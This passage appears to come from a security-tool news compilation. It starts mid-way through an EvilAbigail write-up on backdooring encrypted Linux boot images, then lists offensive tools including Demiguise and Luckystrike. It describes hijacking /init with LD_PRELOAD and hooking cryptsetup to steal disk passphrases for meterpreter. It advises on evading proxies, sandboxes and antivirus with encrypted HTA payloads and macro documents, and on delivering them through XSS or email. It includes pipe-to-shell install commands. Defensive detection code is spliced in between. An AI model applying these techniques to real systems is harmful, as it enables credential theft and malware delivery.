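    with open("/proc/%d/environ" % pid, "rb") as f:
        preload = ld_preload_from_environ(f.read())
    return findings, preload

# Constructed sample: the three lines quoted above plus ordinary mappings for contrast.
SAMPLE_MAPS = """\
55d8b3c00000-55d8b3c2b000 r-xp 00000000 08:01 1048597                    /sbin/init
7f9ee8a56000-7f9ee8a58000 r-xp 00000000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8a58000-7f9ee8c57000 ---p 00002000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8c57000-7f9ee8c58000 rw-p 00001000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8c58000-7f9ee8e17000 r-xp 00000000 08:01 393354                     /lib/x86_64-linux-gnu/libc-2.19.so
7ffd2a5e1000-7ffd2a602000 rw-p 00000000 00:00 0                          [stack]
"""
SAMPLE_ENVIRON = b"PATH=/usr/sbin:/usr/bin\0LD_PRELOAD=/dev/hda1\0TERM=linux\0"

if __name__ == "__main__":
    print(suspicious_mappings(SAMPLE_MAPS))
    print("LD_PRELOAD at exec:", ld_preload_from_environ(SAMPLE_ENVIRON))
```

The text's own caveat applies: a preload that hooks read(2) can lie to this check from inside the same process, so the reliable version of it runs from a trusted environment (a rescue boot or a kernel-side agent), not from a process the library may already be loaded into.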

Kali
Kali is sort of a special case. It has the chained cpio as mentioned below, but doesn't use systemd to boot. As such, the DRACUT OS rule has been generalized such that it extracts blindly, and then the second OS detection catches Kali.
If you add an OS with a cpio containing only kernel/x86/microcode/GenuineIntel.bin, the IDENTIFIER rule should be for the appended cpio, as we will automatically find and extract it.

Redhat Based (Fedora, CentOS)
These systems have a different format for their initrd image compared to Debian based systems. The initrd files stored in /boot are an almost empty cpio archive, with a gzipped cpio archive appended. This second archive is the one containing the initramfs. To unpack this second archive it is necessary to parse the first cpio archive to find the end. Alternatively you can find the string TRAILER!!! and read on until you find gzip magic (\x1f\x8b).
Another difference of these systems is that they are systemd based, and as such the /init executable in the initramfs is a symlink to the systemd binary, rather than a flat sh script. To bypass this limitation, it is necessary to modify the .service files related to mounting the root filesystem.
The usr/lib/systemd/system/initrd-switch-root.service contains the script which is used to pivot to the newly decrypted root. Using the ExecStartPre pragma it is possible to execute other programs before the pivot takes place.
SELinux is present on CentOS, restricting the use of LD_PRELOAD. One working path is /lib. This was located by reading the file at /etc/selinux/targeted/modules/active/file_contexts for a system_u:object_r:lib_t labelled location.
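The two ways of locating the appended archive described above (walk the first cpio to its end, or search for TRAILER!!! and then the gzip magic) are also what an integrity check of a Red Hat style initrd has to do before it can list or hash the real initramfs contents. The following added example, not part of EvilAbigail, implements both against the SVR4 "newc" cpio header format (the format these images use) and builds a constructed sample image so it runs offline; the file names and contents inside the sample are made up, and the 512-byte zero padding between the archives is an assumption about the sample, not a guarantee about every distribution's image.

```python
import gzip

NEWC_MAGIC = b"070701"

def parse_newc(buf, start=0):
    """Parse one 'newc' cpio archive beginning at `start`. Returns (entries, end) where
    entries is a list of (name, data) and end is the offset just past the TRAILER!!! entry.
    Header: 6-byte magic + 13 fixed-width 8-char hex fields (110 bytes), then the
    NUL-terminated name, padded to 4 bytes, then the data, padded to 4 bytes."""
    entries, off = [], start
    while True:
        if buf[off:off + 6] != NEWC_MAGIC:
            raise ValueError("no newc header at offset %d" % off)
        fields = [int(buf[off + 6 + 8 * i: off + 14 + 8 * i], 16) for i in range(13)]
        filesize, namesize = fields[6], fields[11]
        name = buf[off + 110: off + 110 + namesize - 1].decode()
        data_start = off + 110 + namesize
        data_start += -(data_start - start) % 4              # header+name padding
        off = data_start + filesize
        off += -(off - start) % 4                            # data padding
        if name == "TRAILER!!!":
            return entries, off
        entries.append((name, buf[data_start:data_start + filesize]))

def find_appended_archive(buf):
    """Offset of the gzip member that follows the early (microcode) cpio archive,
    found by parsing the first archive to its end and skipping zero padding."""
    off = parse_newc(buf)[1]
    while off < len(buf) and buf[off] == 0:
        off += 1
    if buf[off:off + 2] != b"\x1f\x8b":
        raise ValueError("no gzip member after the first cpio archive")
    return off

def find_by_trailer(buf):
    """The shortcut mentioned above: TRAILER!!! first, then the next gzip magic.
    Cheaper, but 1f 8b appearing in the gap would mislead it; parsing does not."""
    return buf.index(b"\x1f\x8b", buf.index(b"TRAILER!!!"))

def list_inner_files(buf):
    """Names inside the appended initramfs, the part an integrity check must inspect
    (e.g. to diff /init and the systemd .service files against a known-good copy)."""
    inner = gzip.decompress(buf[find_appended_archive(buf):])
    return [name for name, _ in parse_newc(inner)[0]]

# --- builder for the constructed sample input ----------------------------------
def _newc_entry(name, data, mode=0o100644):
    nameb = name.encode() + b"\0"
    hdr = NEWC_MAGIC + "".join("%08x" % v for v in
                               (0, mode, 0, 0, 1, 0, len(data), 0, 0, 0, 0, len(nameb), 0)).encode()
    body = hdr + nameb
    body += b"\0" * (-len(body) % 4)
    return body + data + b"\0" * (-len(data) % 4)

def build_newc(files):
    return b"".join(_newc_entry(n, d) for n, d in files) + _newc_entry("TRAILER!!!", b"", mode=0)

def build_sample_initrd():
    """Constructed Red Hat style image: tiny microcode cpio, zero padding, gzipped initramfs."""
    early = build_newc([("kernel/x86/microcode/GenuineIntel.bin", b"\x01\x00\x00\x00" * 8)])
    early += b"\0" * (-len(early) % 512)
    inner = build_newc([("init", b"#!/bin/sh\necho constructed sample\n"),
                        ("etc/initrd-release", b"NAME=Example\n")])
    return early + gzip.compress(inner)

if __name__ == "__main__":
    img = build_sample_initrd()
    print("gzip member at", find_appended_archive(img), "inner files:", list_inner_files(img))
```

For a real image, feed the bytes of /boot/initramfs-*.img to list_inner_files() and compare the result (and the content of /init and usr/lib/systemd/system/initrd-switch-root.service) against an image regenerated on a trusted machine; the Debian format is simpler, a single gzipped cpio, so parse_newc() on the decompressed bytes is enough there.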

Dropping the shell
Because systemd calls clearenv() before switching root, our LD_PRELOAD variable is wiped out. To bypass this, we can hook clearenv(), and always just replace the environment with only LD_PRELOAD. However, to achieve this, we need to be PID 1 inside the initrd. This is trickier as it is not possible to LD_PRELOAD into this process. To get around this, we have replaced /init with a bash shell script as follows:
#!/bin/bash
export LD_PRELOAD=/hda1
exec /usr/lib/systemd/systemd
This works because /init is just a symlink to /usr/lib/systemd/systemd. exec is used so that the process retains the parent PID (1).
Once this is implemented, and clearenv() is neutralised, it is possible to set LD_PRELOAD for the real pid 1 inside the new root.

Password Stealing
systemd handles passwords for encrypted filesystems completely differently to Debian based init scripts. The passwords are passed around using Unix sockets which allow you to send credentials. To get around this complexity, the easiest method we found to access the password was to hook the crypt_activate_by_passphrase function from libcryptsetup. The relevant parts of the function declaration are as follows:
int crypt_activate_by_passphrase(..., const char *passphrase, size_t passphrase_size, ...);
To access the password we simply hook this function, save passphrase to a file and call the original function obtained by dlsym(RTLD_NEXT, ...). As above, we appended our password to the .so so it is able to parse itself and make the password available to meterpreter.

Artefacts
As above, the .so shows up in /proc/1/maps, /proc/1/environ and ps output.


BlackArch Linux v2017.08.30 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1859 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

  • added more than 50 new tools
  • bugfix: strap.sh (removed 'http:' for pgp keyserver)
  • updated blackarch installer to version 0.5.2 (update: sha1 sum of strap.sh)
  • include kernel 4.12.8
  • updated a lot of blackarch tools
  • updated all system packages
  • update all window manager menus (awesome, fluxbox, openbox)

Download and Installation

BlackArch Linux only takes a moment to setup.
There are three ways to go:

  1. Install on an existing Arch machine.
  2. Use the live ISO.
  3. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk.

Tulpar - Web Vulnerability Scanner


Tulpar is an open source web vulnerability scanner written to automate web penetration testing.

Features
  • Sql Injection (GET Method)
  • XSS (GET Method)
  • Crawl
  • E-mail Disclosure
  • Credit Card Disclosure
  • Whois
  • Command Injection (GET Method)
  • Directory Traversal (GET Method)
  • File Include (GET Method)
  • Server Information
  • Technology Information
  • X-Content-Type Check
  • X-XSS-Protection Check
  • TCP Port Scanner
  • robots.txt Check
  • URL  Encode
  • Certification Information
  • Available Methods
  • Cyber Threat Intelligence
  • IP2Location
  • File Input Available Check

Installation
git clone https://github.com/anilbaranyelken/tulpar.git
cd tulpar
pip install -r requirements.txt


Usage
python tulpar.py action web_URL
action Action: full xss sql fuzzing e-mail credit-card whois links
portscanner urlEncode cyberthreatintelligence commandInjection
directoryTraversal fileInclude headerCheck certificate method
IP2Location FileInputAvailable
web_URL URL

Screenshots (images not included here)
Usage: SQL
Usage: mail


WSSiP - Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa


Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.
There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities.

Installation

From Packaged Application
See Releases.

From npm/yarn (for CLI commands)
Run the following in your command line:
npm:
# Install Electron globally
npm i -g electron@1.7

# Install wssip global for "wssip" command
npm i -g wssip

# Launch!
wssip
yarn: (Make sure the directory in yarn global bin is in your PATH)
yarn global add electron@1.7
yarn global add wssip
wssip
You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.

From Source
Using a command line:
# Clone repository locally
git clone https://github.com/nccgroup/wssip

# Change to the directory
cd wssip

# If you are developing for WSSiP:
# npm i

# If not... (as to minimize disk space):
npm i electron@1.7
npm i --production

# Start application:
npm start

Usage
  1. Open the WSSiP application.
  2. WSSiP will start listening automatically. This will default to localhost on port 8080.
  3. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.
  4. Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.
  5. Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.
  6. ???
  7. Potato.

Fuzzing
WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.
A few of the simple CA certificate downloads are:

Get WebSocket Connection Info
Returns whether the WebSocket id is connected to a web server, and if so, return information.
  • URL
    GET http://mitm/ws/:id
  • URL Params
    id=[integer]
  • Success Response (Not Connected)
    • Code: 200
      Content:{connected: false}
  • Success Response (Connected)
    • Code: 200
      Content:{connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}

Send WebSocket Data
Send WebSocket data.
  • URL
    POST http://mitm/ws/:id/:sender/:mode/:type?log=:log
  • URL Params
    Required:
    id=[integer]
    sender one of client or server
    mode one of message, ping or pong
    type one of ascii or binary (text is an alias of ascii)
    Optional:
    log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.
  • Data Params
    Raw data in the POST field will be sent to the WebSocket server.
  • Success Response:
    • Code: 200
      Content:{success: true}
  • Error Response:
    • Code: 500
      Content:{success: false, reason: 'Error message'}

sdnpwn - An SDN Penetration Testing Toolkit


The Open Networking Foundation defines SDN as “The physical separation of the network control plane from the forwarding plane, and where a control plane controls several devices”. What this means is that the decision making which would traditionally be performed by a router or a switch (i.e. forwarding decisions), is moved to a central device known as a controller. Routers and switches become generic forwarding devices (also known simply as ‘switches’). These forwarding devices, or switches, communicate with the controller at the Southbound Interface (SBI) in order to receive instructions on how to forward network traffic. Applications may communicate with the controller at the Northbound Interface (NBI) to receive network statistics or influence traffic forwarding decisions.

sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs). 

Installation
First download sdnpwn using git
git clone https://github.com/smythtech/sdnpwn
Make the sdnpwn.py and setup.sh scripts executable
sudo chmod +x sdnpwn.py
sudo chmod +x setup.sh
The setup.sh script takes care of installing the software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.
sudo ./setup.sh

Usage
Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.
Modules can be executed like so:
./sdnpwn.py <module name> <module options>
The mods module can be used to list all available modules:
./sdnpwn.py mods
More information about a certain module can be accessed using the info module:
./sdnpwn.py info mods
The above command would retrieve more information about the mods module, such as a description and available options.

Further Information
Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.


D0xk1t - Web-based OSINT and Active Reconnaissance Suite

Active reconnaissance, information gathering and OSINT built in a portable web application.

1.0 Introduction
  1. What is this?
D0xk1t is an open-source, self-hosted and easy to use OSINT and active reconnaissance web application for penetration testers. Based on the prior command-line script, D0xk1t is now fully capable of conducting reconnaissance and penetration testing for security researchers who need a framework without the head-scratching.
  2. Is this a website / web-app?
Yes and no. In essence, it is not a typical website. D0xk1t is self-hosted. There is no server stack, cloud-based service, SaaS, etc. that is holding it up. You have the option of deploying D0xk1t on a local network or deploying your own instance on any infrastructure/technology as you wish (although this is not recommended).
  3. Is this free?
Yes. D0xk1t will forever be open-source. If you wish to contribute, you can make a fork, add any changes, and send a pull request on GitHub.

2.0 Features
  • Easy-to-build, risk-free installation
  • Simple Bootstrap Admin Dashboard
  • Deployable to the Internet
  • Serverless (at the moment)
  • Expansive to any OS

3.0 Installation
Since D0xk1t is self-hosted, it does not work immediately out-of-box. It is recommended that you use a virtualenv container due to the sheer number of dependencies that can run into conflict with your Python configuration.

3.1 Building
Lucky for you, there are two ways to build D0xk1t. The quick 'n easy way, and the manual way.
Quick 'n Easy Way:
$ curl https://raw.githubusercontent.com/ex0dus-0x/D0xk1t/master/extras/install | sudo /bin/bash
Manual Way:
$ git clone https://github.com/ex0dus-0x/D0xk1t && cd D0xk1t
$ # Start virtualenv if you wish
$ pip install -r requirements.txt
$ python run.py

3.2 Configuration
Open config.py. Here, you will see all the environment variables that the application utilizes. There are three important fields you MUST be aware of if you plan to deploy to the web.
GOOGLEMAPS_API_KEY = "YOUR_API_KEY_HERE"

SECRET_KEY = 'SECRET_KEY_HERE'
GOOGLEMAPS_API_KEY denotes the Google Maps API key. This is essential for the GeoIP module. You can obtain it here and change the variable accordingly.
SECRET_KEY is the private key utilized by WTForms' CSRF protection feature. If deployed, change it to your liking.
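One way to make sure the two placeholders above never reach a deployed instance: read the values from the environment and refuse to start while either still holds its default. This is an added example, not D0xk1t's own config handling; the 32-byte minimum for SECRET_KEY is an assumption.

```python
import os
import secrets

# Added example, not part of D0xk1t: a loader for the two config.py values
# named above that refuses the placeholder defaults before deployment.
PLACEHOLDERS = {
    "GOOGLEMAPS_API_KEY": "YOUR_API_KEY_HERE",
    "SECRET_KEY": "SECRET_KEY_HERE",
}
MIN_SECRET_BYTES = 32  # assumption: 256 bits of entropy for the CSRF key


def generate_secret_key(nbytes=MIN_SECRET_BYTES):
    """Return a random hex string suitable for SECRET_KEY."""
    return secrets.token_hex(nbytes)


def load_settings(env=None):
    """Read GOOGLEMAPS_API_KEY and SECRET_KEY from the environment (a dict
    can be passed for testing) instead of hard-coding them in config.py.
    Raises if a value is missing, still a placeholder, or too short."""
    env = os.environ if env is None else env
    settings = {}
    for name, placeholder in PLACEHOLDERS.items():
        value = env.get(name, "")
        if not value:
            raise RuntimeError(f"{name} is not set")
        if value == placeholder:
            raise RuntimeError(f"{name} still holds the placeholder value")
        settings[name] = value
    # a hex token of MIN_SECRET_BYTES bytes is 2 * MIN_SECRET_BYTES characters
    if len(settings["SECRET_KEY"]) < 2 * MIN_SECRET_BYTES:
        raise RuntimeError("SECRET_KEY is too short; use generate_secret_key()")
    return settings


def is_deployable(env=None):
    """True when load_settings() would succeed, else False."""
    try:
        load_settings(env)
        return True
    except RuntimeError:
        return False
```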

3.3 Deployment
Once installed, run with python run.py. The application will perform a first-time boot and will then be accessible at 127.0.0.1:5000. Log in with your credentials, and you will be presented with the admin panel.
Of course, this is self-hosting on localhost. Although work-in-progress, D0xk1t will soon support hosting on a variety of SaaS and server stacks of your choice.
  • Heroku - TODO: build a Procfile, as well as bash scripts for automatic deployment
  • ngrok - TODO: build a script for deployment to ngrok

4.0 Modules

D0x Module
The D0x module is a comprehensive info-gathering database that enables the pentester to write "D0x", a file that holds a collection of data on a certain target or targets. Using this data, the tester will be able to effectively understand their target, which is a critical point in the attacker's kill chain. D0xing is usually deemed malicious and black-hat in nature. However, with the D0x module, we aim to help security researchers gain momentum when conducting in-the-field pentesting.
The D0x module comes with several features, improved upon from the prior revision.
  • Secure database support, with delete and export (as .csv) options

GeoIP Module
When working with metadata, IP addresses often pop up as a point of interest. Using the MaxMind and Google Maps APIs, the GeoIP module aims to collect geolocation information on public IP addresses, in order to gather data on physical location during the reconnaissance stage of the kill chain.
  • Google Maps support for accurate GeoIP visualization
  • API endpoint support for command-liners or developers.

Demiguise - HTA Encryption Tool for RedTeams

What does it do?
The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place, and (if you use environmental keying) to avoid it being sandboxed.

How does it do it?
This is achieved by encrypting the HTA file using RC4, and then using navigator.msSaveBlob to "save" the file at runtime, rather than fetching the HTA directly from the server. This means that at no point is there any HTTP request/response that contains your HTA file in plain-text form: the proxy will simply see a text/html file containing your encrypted blob. In the latest version of Edge, this will result in the user being prompted to "run" the HTA.
Although not the primary aim of this tool, there are a couple of payload-options for the underlying HTA. Each option uses different techniques as previously documented by Matt Nelson, Matthew Demaske, Ryan Hanson and Etienne Stalmans. The benefit of using these techniques is that your code does not execute as a child of mshta.exe. As mentioned previously, the content of the HTA is not the primary aim of this tool. I'd encourage you to modify the HTA template to contain your own custom code :)
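From the defender's side, the technique described above leaves a recognisable shape in the HTML itself: a long opaque literal next to a navigator.msSaveBlob call. The heuristic below scores a page on those indicators; it is an added example, not part of Demiguise, and the literal pattern, entropy threshold and sample pages are assumptions rather than the tool's real output format.

```python
import base64
import hashlib
import math
import re

# Added example, not part of Demiguise: a defender-side heuristic that flags
# HTML pages built the way described above, where opaque data is handed to
# navigator.msSaveBlob at runtime. The literal pattern and thresholds are
# assumptions, not the tool's actual output format.
LITERAL_RE = re.compile(r"""["']([A-Za-z0-9+/=]{256,})["']""")


def shannon_entropy(text):
    """Bits per character; encrypted or base64 data scores close to 6."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def hta_dropper_indicators(html, min_entropy=4.5):
    """List the indicators present in an HTML/JS document."""
    found = []
    if "msSaveBlob" in html:
        found.append("msSaveBlob")
    if re.search(r"\.hta\b", html, re.IGNORECASE):
        found.append("hta-extension")
    literals = [m.group(1) for m in LITERAL_RE.finditer(html)]
    if any(shannon_entropy(s) >= min_entropy for s in literals):
        found.append("high-entropy-literal")
    return found


def is_suspicious(html):
    """Flag only when a Blob save coincides with an opaque embedded literal."""
    found = hta_dropper_indicators(html)
    return "msSaveBlob" in found and "high-entropy-literal" in found


# Constructed samples, not tool output: a benign download page and one that
# carries a long opaque literal (chained SHA-256 digests, base64-encoded).
OPAQUE = base64.b64encode(
    b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))).decode()
BENIGN = "<script>navigator.msSaveBlob(new Blob(['hello']),'report.txt');</script>"
SUSPECT = ("<script>var e='" + OPAQUE + "';"
           "navigator.msSaveBlob(new Blob([e]),'d.hta');</script>")
```

The entropy check is what keeps ordinary msSaveBlob download pages out of the results; the file-extension indicator is reported separately because the saved name is not always visible in the page.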

How do I run it?
Run the demiguise.py file, giving it your encryption key, payload type, output file name and the command that you want the HTA to run.
Example: python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

Environmental Keying
In order to evade sandboxes, you shouldn't embed your key directly in the HTA. Instead you should get this dynamically from the environment the target is based in. An example of this may be to use the client's external IP address as a key. The benefit of this is that if the code is run in a 3rd-party sandbox, the HTA will not decrypt. In fact, the file-name will not even decrypt, meaning that nobody will know what your payload is/does :)
Some examples of environmental keying are given in examples/externalip.js and examples/virginkey.js.

Bonus
Since the tool outputs an HTML file containing JavaScript, you can simply take this JS and host it wherever you like. This means that if your client's website is vulnerable to reflected-XSS, you can use this to serve your HTA file from their (highly trusted) domain.
Also, Outlook doesn't block .html attachments by default, and neither do some other applications - use your imagination! :)

Detection
Currently it is not detected on VT:
https://www.virustotal.com/en/file/24b86ee6210b2abc446021feacfe25502b60403455aa24a32c80b2e7b0f81a70/analysis/1499880541/

Defense
Although obfuscation techniques may be hard to signature, one way to defend against HTA attacks is to prevent the HTA itself from being able to run in the first place. This can be achieved either through the use of Software Restriction Policy (SRP), Device Guard (on Windows 10 and Server 2016), or by changing the default file-handler associated with .hta files.
Please note that these changes may potentially affect the running of software that relies on HTA execution. Therefore it is recommended that a fix is fully tested in your own environment.

Using SRP:

Changing the default file-handler:
ftype htafile=%SystemRoot%\system32\NOTEPAD.EXE %1

Changing it back (x64):
ftype htafile=C:\Windows\SysWOW64\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %*

Luckystrike - A PowerShell based utility for the creation of malicious Office macro documents

PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.

Luckystrike is a menu-driven (SET-style) PowerShell-based generator of malicious .xls and .doc documents. All your payloads are saved into a database for easy retrieval & embedding into a new or existing document. Luckystrike provides you several infection methods designed to get your payloads to execute without tripping AV. See the "Installation" section below for instructions on getting started.

DerbyCon 6.0 Tool Drop Talk: https://www.youtube.com/watch?v=1Yzg1xps2kE

Installation
Requirements
  1. Windows 7/10 (preferably x64)
  2. PowerShell v5+
  3. Microsoft Office 2010+ installed
To install, execute the following command from an administrative PowerShell prompt (Required to install the PSSQLite module). A luckystrike directory will be created automatically.
iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')
To run, simply cd to the luckystrike directory, then .\luckystrike.ps1

Upgrading
Luckystrike will check for updates upon opening. You will be prompted to update. Any templates and payloads you have in the database are preserved.
